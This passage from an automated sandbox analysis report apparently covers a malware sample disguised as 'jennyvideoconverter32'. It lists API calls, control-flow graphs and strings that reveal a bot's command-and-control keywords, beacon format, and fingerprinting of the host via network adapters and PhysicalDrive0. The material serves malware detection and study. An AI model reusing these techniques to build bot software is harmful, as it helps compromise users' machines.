                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E27784
                                                                            • _sprintf.LIBCMT ref: 02E27822
                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02E278E6
                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02E2791A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                            • API String ID: 696907137-1839899575
                                                                            • Opcode ID: f0f22266fc6c50a793ea7d566465d7f45c92123209e2561076bb54a0fd092cf0
                                                                            • Instruction ID: 969362310f7b9a0e0f3ee6abc07014ec4747165a147fedfec1bb6add8f28286f
                                                                            • Opcode Fuzzy Hash: f0f22266fc6c50a793ea7d566465d7f45c92123209e2561076bb54a0fd092cf0
                                                                            • Instruction Fuzzy Hash: 0C3227315C83919FE7359B24DC05BAFB7E6AF85314F00A81DF58A97291EB719408CFA2

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 213 2e2648b-2e266f1 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2e242c7 GetTickCount call 2e2605a GetVersionExA call 2e34a30 call 2e32eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2e34a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2e32eec * 4 QueryPerformanceCounter Sleep call 2e32eec * 2 call 2e34a30 * 2 258 2e266f4-2e266f6 213->258 259 2e266f8-2e266fd 258->259 260 2e266ff-2e26701 258->260 263 2e26708 Sleep 259->263 261 2e26703 260->261 262 2e2670e-2e26742 RtlEnterCriticalSection RtlLeaveCriticalSection 260->262 261->263 264 2e26792 262->264 265 2e26744-2e26750 262->265 263->262 267 2e26796-2e272c3 InternetOpenA 264->267 265->264 266 2e26752-2e2675f 265->266 269 2e26761-2e26765 266->269 270 2e26767-2e26768 266->270 271 2e27389-2e2738f 267->271 272 2e272c9-2e27340 InternetSetOptionA * 3 call 2e34a30 InternetOpenUrlA 267->272 273 2e2676c-2e26790 call 2e34a30 * 2 269->273 270->273 275 2e27391-2e27397 271->275 276 2e273ab-2e273b9 271->276 286 2e27382-2e27383 InternetCloseHandle 272->286 287 2e27342 272->287 273->267 280 2e27399-2e2739b 275->280 281 2e2739d-2e273aa call 2e253ec 275->281 276->258 278 2e273bf-2e273e3 call 2e34a30 call 2e2439c 276->278 278->258 296 2e273e9-2e27417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2e3227c 278->296 280->276 281->276 286->271 291 2e27346-2e2736c InternetReadFile 287->291 293 2e27377-2e2737e InternetCloseHandle 291->293 294 2e2736e-2e27375 291->294 293->286 294->291 299 2e27419-2e2742b call 2e3227c 296->299 300 2e2746d-2e27488 call 2e3227c 296->300 299->300 307 2e2742d-2e2743f call 2e3227c 299->307 305 2e27742-2e27754 call 2e3227c 300->305 306 2e2748e-2e27490 300->306 315 2e27756-2e27758 305->315 316 2e2779d-2e277af call 2e3227c 305->316 306->305 309 2e27496-2e27548 call 2e32eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2e34a30 * 5 call 2e2439c * 2 306->309 307->300 314 2e27441-2e27453 call 2e3227c 307->314 373 2e27585 309->373 374 2e2754a-2e2754c 309->374 314->300 328 2e27455-2e27467 call 2e3227c 314->328 315->316 320 2e2775a-2e27798 call 2e34a30 RtlEnterCriticalSection RtlLeaveCriticalSection 315->320 329 2e277d0-2e277e2 call 2e3227c 316->329 330 2e277b1-2e277bf call 2e261f5 call 2e26303 316->330 320->258 328->258 328->300 341 2e27b00-2e27b12 call 2e3227c 329->341 342 2e277e8-2e277ea 329->342 344 2e277c4-2e277cb call 2e2640e 330->344 341->258 354 2e27b18-2e27b46 call 2e32eec call 2e34a30 call 2e2439c 341->354 342->341 346 2e277f0-2e27807 call 2e2439c 342->346 344->258 346->258 355 2e2780d-2e278db call 2e32358 call 2e21ba7 346->355 375 2e27b48-2e27b4a call 2e2534d 354->375 376 2e27b4f-2e27b56 call 2e32eb4 354->376 371 2e278e2-2e27903 RtlEnterCriticalSection 355->371 372 2e278dd call 2e2143f 355->372 379 2e27905-2e2790c 371->379 380 2e2790f-2e27973 RtlLeaveCriticalSection call 2e23c67 call 2e23d7e call 2e2826e 371->380 372->371 377 2e27589-2e275b7 call 2e32eec call 2e34a30 call 2e2439c 373->377 374->373 381 2e2754e-2e27560 call 2e3227c 374->381 375->376 376->258 404 2e275f8-2e27601 call 2e32eb4 377->404 405 2e275b9-2e275c8 call 2e33529 377->405 379->380 402 2e27ae7-2e27afb call 2e28f36 380->402 403 2e27979-2e279c1 call 2e2a658 380->403 381->373 391 2e27562-2e27583 call 2e2439c 381->391 391->377 402->258 414 2e27ab1-2e27ae2 call 2e2831d call 2e233b2 403->414 415 2e279c7-2e279ce 403->415 416 2e27607-2e2761f call 2e33a8f 404->416 417 2e27738-2e2773b 404->417 405->404 418 2e275ca 405->418 414->402 420 2e279d1-2e279d6 415->420 430 2e27621-2e27629 call 2e2966a 416->430 431 2e2762b 416->431 417->305 422 2e275cf-2e275e1 call 2e32790 418->422 420->420 425 2e279d8-2e27a23 call 2e2a658 420->425 433 2e275e3 422->433 434 2e275e6-2e275f6 call 2e33529 422->434 425->414 439 2e27a29-2e27a2f 425->439 432 2e2762d-2e276cf call 2e2a782 call 2e23863 call 2e25119 call 2e23863 call 2e2aa28 call 2e2ab42 430->432 431->432 459 2e276d4-2e276e5 432->459 433->434 434->404 434->422 443 2e27a32-2e27a37 439->443 443->443 445 2e27a39-2e27a74 call 2e2a658 443->445 445->414 451 2e27a76-2e27aaa call 2e2d04a 445->451 454 2e27aaf-2e27ab0 451->454 454->414 460 2e276e7 call 2e2380b 459->460 461 2e276ec-2e27717 Sleep call 2e31830 459->461 460->461 465 2e27723-2e27731 461->465 466 2e27719-2e27722 call 2e24100 461->466 465->417 468 2e27733 call 2e2380b 465->468 466->465 468->417
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.NTDLL(02E571B8), ref: 02E264BA
                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02E264D1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02E264DA
                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02E264E9
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02E264EC
                                                                            • GetTickCount.KERNEL32 ref: 02E264F8
                                                                              • Part of subcall function 02E2605A: _malloc.LIBCMT ref: 02E26068
                                                                            • GetVersionExA.KERNEL32(02E57010), ref: 02E26525
                                                                            • _memset.LIBCMT ref: 02E26544
                                                                            • _malloc.LIBCMT ref: 02E26551
                                                                              • Part of subcall function 02E32EEC: __FF_MSGBANNER.LIBCMT ref: 02E32F03
                                                                              • Part of subcall function 02E32EEC: __NMSG_WRITE.LIBCMT ref: 02E32F0A
                                                                              • Part of subcall function 02E32EEC: RtlAllocateHeap.NTDLL(00AD0000,00000000,00000001), ref: 02E32F2F
                                                                            • _malloc.LIBCMT ref: 02E26561
                                                                            • _malloc.LIBCMT ref: 02E2656C
                                                                            • _malloc.LIBCMT ref: 02E26577
                                                                            • _malloc.LIBCMT ref: 02E26582
                                                                            • _malloc.LIBCMT ref: 02E2658D
                                                                            • _malloc.LIBCMT ref: 02E26598
                                                                            • _malloc.LIBCMT ref: 02E265A7
                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02E265BE
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02E265C7
                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02E265D6
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02E265D9
                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02E265E4
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02E265E7
                                                                            • _memset.LIBCMT ref: 02E265FA
                                                                            • _memset.LIBCMT ref: 02E26606
                                                                            • _memset.LIBCMT ref: 02E26613
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E26621
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E2662E
                                                                            • _malloc.LIBCMT ref: 02E26652
                                                                            • _malloc.LIBCMT ref: 02E26660
                                                                            • _malloc.LIBCMT ref: 02E26667
                                                                            • _malloc.LIBCMT ref: 02E2668D
                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02E266A0
                                                                            • Sleep.KERNELBASE ref: 02E266AE
                                                                            • _malloc.LIBCMT ref: 02E266BA
                                                                            • _malloc.LIBCMT ref: 02E266C7
                                                                            • _memset.LIBCMT ref: 02E266DC
                                                                            • _memset.LIBCMT ref: 02E266EC
                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02E26708
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E26713
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E26724
                                                                            • _memset.LIBCMT ref: 02E26779
                                                                            • _memset.LIBCMT ref: 02E26788
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                            • API String ID: 2251652938-2678694477
                                                                            • Opcode ID: 8d837717217580abbfd8679bb6583107346b76b93b5f6c9ebe4bf7fae5117528
                                                                            • Instruction ID: 15f8ae37da3edc9b5254d94783a021d12536795ff827d83a197d4cd78756f755
                                                                            • Opcode Fuzzy Hash: 8d837717217580abbfd8679bb6583107346b76b93b5f6c9ebe4bf7fae5117528
                                                                            • Instruction Fuzzy Hash: DB71D471DD43609FE311AF31AC09B5BBBE8AF85310F009C19FA8597280EBB45851CFA6

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 832 401b4b-401b68 LoadLibraryA 833 401c21-401c25 832->833 834 401b6e-401b7f GetProcAddress 832->834 835 401b85-401b8e 834->835 836 401c18-401c1b FreeLibrary 834->836 837 401b95-401ba5 GetAdaptersInfo 835->837 836->833 838 401ba7-401bb0 837->838 839 401bdb-401be3 837->839 842 401bc1-401bd7 call 402bc0 call 4018cc 838->842 843 401bb2-401bb6 838->843 840 401be5-401beb call 402ba6 839->840 841 401bec-401bf0 839->841 840->841 847 401bf2-401bf6 841->847 848 401c15-401c17 841->848 842->839 843->839 844 401bb8-401bbf 843->844 844->842 844->843 847->848 851 401bf8-401bfb 847->851 848->836 853 401c06-401c13 call 402b98 851->853 854 401bfd-401c03 851->854 853->837 853->848 854->853
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                            • API String ID: 514930453-3667123677
                                                                            • Opcode ID: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                            • Instruction ID: 9300e3b8f0653b0f10764aaa79a1f2494f67c894d04353eb45b18fdb2f867aae
                                                                            • Opcode Fuzzy Hash: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                            • Instruction Fuzzy Hash: 9621B870944109AFEF11DF65C944BEF7BB8EF41344F1440BAE504B22E1E778A985CB69

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 906 2e2f8da-2e2f8fd LoadLibraryA 907 2e2f903-2e2f911 GetProcAddress 906->907 908 2e2f9bd-2e2f9c4 906->908 909 2e2f9b6-2e2f9b7 FreeLibrary 907->909 910 2e2f917-2e2f927 907->910 909->908 911 2e2f929-2e2f935 GetAdaptersInfo 910->911 912 2e2f937 911->912 913 2e2f96d-2e2f975 911->913 914 2e2f939-2e2f940 912->914 915 2e2f977-2e2f97d call 2e336eb 913->915 916 2e2f97e-2e2f983 913->916 917 2e2f942-2e2f946 914->917 918 2e2f94a-2e2f952 914->918 915->916 920 2e2f9b1-2e2f9b5 916->920 921 2e2f985-2e2f988 916->921 917->914 923 2e2f948 917->923 924 2e2f955-2e2f95a 918->924 920->909 921->920 922 2e2f98a-2e2f98f 921->922 926 2e2f991-2e2f999 922->926 927 2e2f99c-2e2f9a7 call 2e33a8f 922->927 923->913 924->924 928 2e2f95c-2e2f969 call 2e2f629 924->928 926->927 927->920 933 2e2f9a9-2e2f9ac 927->933 928->913 933->911
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02E2F8F0
                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02E2F909
                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02E2F92E
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02E2F9B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                            • API String ID: 514930453-3114217049
                                                                            • Opcode ID: 84a00d01d6475040bfb0dae53fe16a71dd6e50fb135ee707e3424e4c8a7fb70f
                                                                            • Instruction ID: 9b23a61ed22d9bcf92ffc78697920f73342200523823220e01dd22428d8616a4
                                                                            • Opcode Fuzzy Hash: 84a00d01d6475040bfb0dae53fe16a71dd6e50fb135ee707e3424e4c8a7fb70f
                                                                            • Instruction Fuzzy Hash: EC21F871E84219AFDB10CFE9D8446EEBBF8EF04318F0490AAE546F7601D7309949CBA0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 991 2e2f7d6-2e2f801 CreateFileA 992 2e2f8d2-2e2f8d9 991->992 993 2e2f807-2e2f81c 991->993 994 2e2f81f-2e2f841 DeviceIoControl 993->994 995 2e2f843-2e2f84b 994->995 996 2e2f87a-2e2f882 994->996 997 2e2f854-2e2f859 995->997 998 2e2f84d-2e2f852 995->998 999 2e2f884-2e2f88a call 2e336eb 996->999 1000 2e2f88b-2e2f88d 996->1000 997->996 1001 2e2f85b-2e2f863 997->1001 998->996 999->1000 1003 2e2f8c8-2e2f8d1 CloseHandle 1000->1003 1004 2e2f88f-2e2f892 1000->1004 1005 2e2f866-2e2f86b 1001->1005 1003->992 1007 2e2f894-2e2f89d GetLastError 1004->1007 1008 2e2f8ae-2e2f8bb call 2e33a8f 1004->1008 1005->1005 1010 2e2f86d-2e2f879 call 2e2f629 1005->1010 1007->1003 1011 2e2f89f-2e2f8a2 1007->1011 1008->1003 1015 2e2f8bd-2e2f8c3 1008->1015 1010->996 1011->1008 1012 2e2f8a4-2e2f8ab 1011->1012 1012->1008 1015->994
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02E2F7F5
                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02E2F833
                                                                            • GetLastError.KERNEL32 ref: 02E2F894
                                                                            • CloseHandle.KERNELBASE(?), ref: 02E2F8CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                            • String ID: \\.\PhysicalDrive0
                                                                            • API String ID: 4026078076-1180397377
                                                                            • Opcode ID: cb96255a2e5aef3f343502b8141cefb9b68eba9997240aa473c2068f5a060c02
                                                                            • Instruction ID: 9d7b17f15e8498f4c07ee701fc6538b87be08674f85f348f4f03a609976f04ec
                                                                            • Opcode Fuzzy Hash: cb96255a2e5aef3f343502b8141cefb9b68eba9997240aa473c2068f5a060c02
                                                                            • Instruction Fuzzy Hash: 2231D475D80229ABDB18CF95D884BEEFBB8FF05714F20816EE506A3680C7705A09CBD0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1017 401a4f-401a77 CreateFileA 1018 401b45-401b4a 1017->1018 1019 401a7d-401a91 1017->1019 1020 401a98-401ac0 DeviceIoControl 1019->1020 1021 401ac2-401aca 1020->1021 1022 401af3-401afb 1020->1022 1023 401ad4-401ad9 1021->1023 1024 401acc-401ad2 1021->1024 1025 401b04-401b07 1022->1025 1026 401afd-401b03 call 402ba6 1022->1026 1023->1022 1030 401adb-401af1 call 402bc0 call 4018cc 1023->1030 1024->1022 1028 401b09-401b0c 1025->1028 1029 401b3a-401b44 CloseHandle 1025->1029 1026->1025 1032 401b27-401b34 call 402b98 1028->1032 1033 401b0e-401b17 GetLastError 1028->1033 1029->1018 1030->1022 1032->1020 1032->1029 1033->1029 1035 401b19-401b1c 1033->1035 1035->1032 1038 401b1e-401b24 1035->1038 1038->1032
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                                            • CloseHandle.KERNELBASE(?), ref: 00401B3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                            • String ID: \\.\PhysicalDrive0
                                                                            • API String ID: 4026078076-1180397377
                                                                            • Opcode ID: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                            • Instruction ID: c07866d4b4e887281577b2397114bebd63d98cfae9bba907e2345ee80fd6f57b
                                                                            • Opcode Fuzzy Hash: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                            • Instruction Fuzzy Hash: 00316D71D01118EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3786E45CB98
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: CtrlDispatcherEventServiceStartlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3665080917-0
                                                                            • Opcode ID: a2952c6a3fbd28e0accaa57e844d030e981a787fc7a1bb76611cec4b22fde3e1
                                                                            • Instruction ID: 969fb6242b90c18dc11a1844badb58636817ec9d1214cc78876ef9f551083592
                                                                            • Opcode Fuzzy Hash: a2952c6a3fbd28e0accaa57e844d030e981a787fc7a1bb76611cec4b22fde3e1
                                                                            • Instruction Fuzzy Hash: 0DE04670908106EACA00EBA28E4966A366CEA08314721447BE507B01E1D73C8516BAAF

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 471 2e26429-2e2643f 472 2e26441-2e26444 471->472 473 2e264b8-2e264ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 471->473 472->473 474 2e264f3-2e266f1 GetTickCount call 2e2605a GetVersionExA call 2e34a30 call 2e32eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2e34a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2e32eec * 4 QueryPerformanceCounter Sleep call 2e32eec * 2 call 2e34a30 * 2 473->474 475 2e264ee call 2e242c7 473->475 518 2e266f4-2e266f6 474->518 475->474 519 2e266f8-2e266fd 518->519 520 2e266ff-2e26701 518->520 523 2e26708 Sleep 519->523 521 2e26703 520->521 522 2e2670e-2e26742 RtlEnterCriticalSection RtlLeaveCriticalSection 520->522 521->523 524 2e26792 522->524 525 2e26744-2e26750 522->525 523->522 527 2e26796-2e272c3 InternetOpenA 524->527 525->524 526 2e26752-2e2675f 525->526 529 2e26761-2e26765 526->529 530 2e26767-2e26768 526->530 531 2e27389-2e2738f 527->531 532 2e272c9-2e27340 InternetSetOptionA * 3 call 2e34a30 InternetOpenUrlA 527->532 533 2e2676c-2e26790 call 2e34a30 * 2 529->533 530->533 535 2e27391-2e27397 531->535 536 2e273ab-2e273b9 531->536 546 2e27382-2e27383 InternetCloseHandle 532->546 547 2e27342 532->547 533->527 540 2e27399-2e2739b 535->540 541 2e2739d-2e273aa call 2e253ec 535->541 536->518 538 2e273bf-2e273e3 call 2e34a30 call 2e2439c 536->538 538->518 556 2e273e9-2e27417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2e3227c 538->556 540->536 541->536 546->531 551 2e27346-2e2736c InternetReadFile 547->551 553 2e27377-2e2737e InternetCloseHandle 551->553 554 2e2736e-2e27375 551->554 553->546 554->551 559 2e27419-2e2742b call 2e3227c 556->559 560 2e2746d-2e27488 call 2e3227c 556->560 559->560 567 2e2742d-2e2743f call 2e3227c 559->567 565 2e27742-2e27754 call 2e3227c 560->565 566 2e2748e-2e27490 560->566 575 2e27756-2e27758 565->575 576 2e2779d-2e277af call 2e3227c 565->576 566->565 569 2e27496-2e27548 call 2e32eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2e34a30 * 5 call 2e2439c * 2 566->569 567->560 574 2e27441-2e27453 call 2e3227c 567->574 633 2e27585 569->633 634 2e2754a-2e2754c 569->634 574->560 588 2e27455-2e27467 call 2e3227c 574->588 575->576 580 2e2775a-2e27798 call 2e34a30 RtlEnterCriticalSection RtlLeaveCriticalSection 575->580 589 2e277d0-2e277e2 call 2e3227c 576->589 590 2e277b1-2e277cb call 2e261f5 call 2e26303 call 2e2640e 576->590 580->518 588->518 588->560 601 2e27b00-2e27b12 call 2e3227c 589->601 602 2e277e8-2e277ea 589->602 590->518 601->518 614 2e27b18-2e27b46 call 2e32eec call 2e34a30 call 2e2439c 601->614 602->601 606 2e277f0-2e27807 call 2e2439c 602->606 606->518 615 2e2780d-2e278db call 2e32358 call 2e21ba7 606->615 635 2e27b48-2e27b4a call 2e2534d 614->635 636 2e27b4f-2e27b56 call 2e32eb4 614->636 631 2e278e2-2e27903 RtlEnterCriticalSection 615->631 632 2e278dd call 2e2143f 615->632 639 2e27905-2e2790c 631->639 640 2e2790f-2e27973 RtlLeaveCriticalSection call 2e23c67 call 2e23d7e call 2e2826e 631->640 632->631 637 2e27589-2e275b7 call 2e32eec call 2e34a30 call 2e2439c 633->637 634->633 641 2e2754e-2e27560 call 2e3227c 634->641 635->636 636->518 664 2e275f8-2e27601 call 2e32eb4 637->664 665 2e275b9-2e275c8 call 2e33529 637->665 639->640 662 2e27ae7-2e27afb call 2e28f36 640->662 663 2e27979-2e279c1 call 2e2a658 640->663 641->633 651 2e27562-2e27583 call 2e2439c 641->651 651->637 662->518 674 2e27ab1-2e27ae2 call 2e2831d call 2e233b2 663->674 675 2e279c7-2e279ce 663->675 676 2e27607-2e2761f call 2e33a8f 664->676 677 2e27738-2e2773b 664->677 665->664 678 2e275ca 665->678 674->662 680 2e279d1-2e279d6 675->680 690 2e27621-2e27629 call 2e2966a 676->690 691 2e2762b 676->691 677->565 682 2e275cf-2e275e1 call 2e32790 678->682 680->680 685 2e279d8-2e27a23 call 2e2a658 680->685 693 2e275e3 682->693 694 2e275e6-2e275f6 call 2e33529 682->694 685->674 699 2e27a29-2e27a2f 685->699 692 2e2762d-2e276e5 call 2e2a782 call 2e23863 call 2e25119 call 2e23863 call 2e2aa28 call 2e2ab42 690->692 691->692 720 2e276e7 call 2e2380b 692->720 721 2e276ec-2e27717 Sleep call 2e31830 692->721 693->694 694->664 694->682 703 2e27a32-2e27a37 699->703 703->703 705 2e27a39-2e27a74 call 2e2a658 703->705 705->674 711 2e27a76-2e27ab0 call 2e2d04a 705->711 711->674 720->721 725 2e27723-2e27731 721->725 726 2e27719-2e27722 call 2e24100 721->726 725->677 728 2e27733 call 2e2380b 725->728 726->725 728->677
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.NTDLL(02E571B8), ref: 02E264BA
                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02E264D1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02E264DA
                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02E264E9
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02E264EC
                                                                            • GetTickCount.KERNEL32 ref: 02E264F8
                                                                            • GetVersionExA.KERNEL32(02E57010), ref: 02E26525
                                                                            • _memset.LIBCMT ref: 02E26544
                                                                            • _malloc.LIBCMT ref: 02E26551
                                                                            • _malloc.LIBCMT ref: 02E26561
                                                                            • _malloc.LIBCMT ref: 02E2656C
                                                                            • _malloc.LIBCMT ref: 02E26577
                                                                            • _malloc.LIBCMT ref: 02E26582
                                                                            • _malloc.LIBCMT ref: 02E2658D
                                                                            • _malloc.LIBCMT ref: 02E26598
                                                                            • _malloc.LIBCMT ref: 02E265A7
                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02E265BE
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02E265C7
                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02E265D6
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02E265D9
                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02E265E4
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02E265E7
                                                                            • _memset.LIBCMT ref: 02E265FA
                                                                            • _memset.LIBCMT ref: 02E26606
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _malloc$Heap$AllocateProcess_memset$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                            • API String ID: 2445331799-2678694477
                                                                            • Opcode ID: f2a7a150290f350ad7d376bfc8b727bff7cd62857e6124173082ff16cf6b52a5
                                                                            • Instruction ID: 2fbbacf9a5b9d0c0f8aeec70fb24ee8d3ae515250638ddea3954765d07f0253e
                                                                            • Opcode Fuzzy Hash: f2a7a150290f350ad7d376bfc8b727bff7cd62857e6124173082ff16cf6b52a5
                                                                            • Instruction Fuzzy Hash: B271F7B1DD53609FE311AF31AC09B5FBBE9AF85310F009819FA8597280DBB45851CFA6

                                                                            Control-flow Graph

                                                                            APIs
